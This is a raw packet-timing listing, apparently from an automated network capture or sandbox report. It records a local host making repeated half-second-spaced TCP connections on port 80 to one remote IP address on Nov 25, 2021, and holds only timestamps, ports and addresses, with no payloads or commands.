                                              Nov 25, 2021 10:54:01.028495073 CET5054080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.062335014 CET8050540176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.082277060 CET8050540176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.082335949 CET8050540176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.082611084 CET5054080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.082670927 CET5054080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.116682053 CET8050540176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.432734013 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.465904951 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.466113091 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.467669964 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.500941038 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.501169920 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.534522057 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.550327063 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.550381899 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.550662994 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.550750017 CET5054180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.584074020 CET8050541176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.926959991 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.961051941 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.961287975 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.962780952 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:01.997047901 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:01.997369051 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.031610012 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.047734022 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.047799110 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.047985077 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.048047066 CET5054280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.082113028 CET8050542176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.438077927 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.471487999 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.471663952 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.473185062 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.506582975 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.506793022 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.540174961 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.557339907 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.557396889 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.557677984 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.557777882 CET5054380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.591439962 CET8050543176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.963190079 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.997267008 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:02.997499943 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:02.999053001 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.033139944 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.033376932 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.067373037 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.095596075 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.095644951 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.095932007 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.095979929 CET5054480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.130312920 CET8050544176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.478849888 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.512263060 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.512480974 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.513998985 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.547323942 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.547540903 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.580976963 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.598150969 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.598201990 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.598412991 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.598474979 CET5054580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:03.631905079 CET8050545176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:03.979336023 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.013431072 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.013609886 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.015227079 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.049223900 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.049458981 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.083389997 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.102054119 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.102103949 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.102343082 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.102607012 CET5054680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.136271000 CET8050546176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.487925053 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.521466970 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.521713972 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.523262978 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.556608915 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.556833029 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.590320110 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.608227968 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.608283997 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.608475924 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.608527899 CET5054780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:04.642107010 CET8050547176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:04.994482040 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.028568029 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.028774977 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.030325890 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.064327002 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.064660072 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.098691940 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.115741014 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.115796089 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.115973949 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.116038084 CET5054880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.150223017 CET8050548176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.465703011 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.499618053 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.499849081 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.501409054 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.535207987 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.535341024 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.569142103 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.585587025 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.585606098 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.585829020 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.585846901 CET5054980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.619718075 CET8050549176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.927823067 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.961204052 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.961426973 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.963027000 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:05.996408939 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:05.996619940 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.029946089 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.046257973 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.046307087 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.046448946 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.046497107 CET5055380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.080146074 CET8050553176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.437700033 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.471236944 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.471443892 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.473005056 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.506485939 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.506829023 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.540294886 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.556282043 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.556337118 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.556613922 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.556677103 CET5055480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.590131044 CET8050554176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.883641005 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.916743994 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.917064905 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.918600082 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.951720953 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:06.951936007 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:06.985162973 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.002161026 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.002209902 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.002525091 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.002559900 CET5055580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.035964012 CET8050555176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.354302883 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.387780905 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.387959957 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.389478922 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.422878981 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.423141956 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.456537008 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.487277985 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.487329960 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.487513065 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.487574100 CET5055680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.521039963 CET8050556176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.858033895 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.892122984 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.892410994 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.893918037 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.927961111 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.928214073 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.962157011 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.983906984 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.983964920 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:07.984159946 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:07.984213114 CET5055780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.018265963 CET8050557176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.370635986 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.404052973 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.404335022 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.406130075 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.439402103 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.439901114 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.473244905 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.498502970 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.498580933 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.498748064 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.498799086 CET5055880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.532176018 CET8050558176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.871279001 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.904700994 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.904855013 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.906487942 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.939886093 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.940051079 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.973409891 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.998106003 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.998161077 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:08.998354912 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:08.998409986 CET5055980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.031867027 CET8050559176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.378426075 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.412513018 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.412683010 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.414303064 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.448466063 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.448623896 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.483021021 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.501857996 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.501907110 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.502114058 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.502157927 CET5056080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.536211967 CET8050560176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.875439882 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.908518076 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.908673048 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.910267115 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.943380117 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.943825006 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.976982117 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.999290943 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.999322891 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:09.999542952 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:09.999577045 CET5056180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.033092022 CET8050561176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.361099958 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.394512892 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.394732952 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.396250963 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.429699898 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.430008888 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.463459969 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.480978966 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.481030941 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.481195927 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.481247902 CET5056280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.514787912 CET8050562176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.866650105 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.900366068 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.900573969 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.902122974 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.935595989 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.935837984 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.969374895 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.993756056 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.993805885 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:10.994040966 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:10.994090080 CET5056380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.028063059 CET8050563176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.388878107 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.422269106 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.422602892 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.424071074 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.457386971 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.457566977 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.491152048 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.508637905 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.508692980 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.508838892 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.508893967 CET5056480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.542336941 CET8050564176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.913506985 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.947587967 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.947741985 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.949253082 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:11.983104944 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:11.983292103 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.017143011 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.037087917 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.037132978 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.037303925 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.037350893 CET5056580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.071613073 CET8050565176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.406912088 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.440994024 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.441304922 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.442909956 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.476913929 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.477206945 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.511117935 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.526679039 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.526726007 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.526962042 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.527012110 CET5056680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.561043024 CET8050566176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.869085073 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.903038979 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.903228045 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.904803038 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.938697100 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.938934088 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.973081112 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.995860100 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.995924950 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:12.996057987 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:12.996112108 CET5056780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.030349016 CET8050567176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.397397995 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.430790901 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.431061983 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.432565928 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.465950966 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.466087103 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.499429941 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.516068935 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.516119003 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.516259909 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.516308069 CET5056880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.549761057 CET8050568176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.895729065 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.929120064 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.929405928 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.930896044 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.964227915 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:13.964442015 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:13.997946024 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.014487982 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.014544010 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.014710903 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.014769077 CET5056980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.048510075 CET8050569176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.400244951 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.434484959 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.434665918 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.436252117 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.470370054 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.470554113 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.504709005 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.520673990 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.520729065 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.520874023 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.520931005 CET5057080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.555200100 CET8050570176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.904534101 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.937949896 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.938132048 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.939599991 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:14.973001003 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:14.973181963 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.006818056 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:15.023457050 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:15.023550987 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:15.023708105 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.023772955 CET5057180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.057248116 CET8050571176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:15.387653112 CET5057280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.420819998 CET8050572176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:54:15.421174049 CET5057280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.422755957 CET5057280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:54:15.455893040 CET8050572176.223.209.128192.168.11.20
